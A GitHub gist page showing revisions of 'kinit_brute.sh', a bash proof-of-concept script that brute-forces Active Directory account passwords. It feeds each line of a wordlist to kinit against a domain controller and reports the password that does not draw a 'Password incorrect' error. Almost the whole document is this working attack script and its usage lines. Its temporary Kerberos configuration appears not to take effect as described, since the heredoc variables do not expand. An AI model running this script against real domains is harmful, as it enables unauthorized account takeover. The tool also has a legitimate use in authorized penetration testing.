-
-
Save Raikia/f13105c7f0874e616515e858f2ba1b85 to your computer and use it in GitHub Desktop.
Revisions
-
ropnop revised this gist
Jul 27, 2017 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -5,7 +5,7 @@ # Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller # The script configures the realm and KDC for you based on the domain provided and the domain controller # Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf # Only tested with Heimdal kerberos (error messages might be different for MIT clients). Install: $ apt-get install heimdal-clients USERNAME=$1 -
Jul 26, 2017 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,61 @@ #!/bin/bash # Title: kinit_brute.sh # Author: @ropnop # Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller # The script configures the realm and KDC for you based on the domain provided and the domain controller # Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf # Only tested with Heimdal kerberos (error messages might be different for MIT clients) USERNAME=$1 DOMAINCONTROLLER=$2 WORDLIST=$3 if [[ $# -ne 3 ]]; then echo "[!] Usage: ./kinit_brute.sh full_username domainController wordlist_file" echo "[!] Example: ./kinit_brute.sh [email protected] dc01.contoso.com passwords.txt" exit 1 fi DOMAIN=$(echo $USERNAME | awk -F@ '{print toupper($2)}') echo "[+] User: $USERNAME" echo "[+] Kerberos Realm: $DOMAIN" echo "[+] KDC: $DOMAINCONTROLLER" echo "" KRB5_CONF=$(mktemp) cat > $KRB5_CONF <<'asdfasdf' [libdefaults] default_realm = $DOMAIN [realms] $DOMAIN = { kdc = $DOMAINCONTROLLER admin_server = $DOMAINCONTROLLER } asdfasdf while read PASSWORD; do RESULT=$( echo $PASSWORD | kinit --password-file=STDIN $USERNAME 2>&1 ) if [[ $RESULT == *"unable to reach"* ]]; then echo "[!] Unable to find KDC for realm. Check domain and DC" exit 1 fi if [[ $RESULT == *"Wrong realm"* ]]; then echo "[!] Wrong realm. Make sure domain and DC are correct" exit 1 fi if [[ $RESULT != *"Password incorrect"* ]]; then echo "[+] Found password: $PASSWORD" echo "" exit 1 fi done <$WORDLIST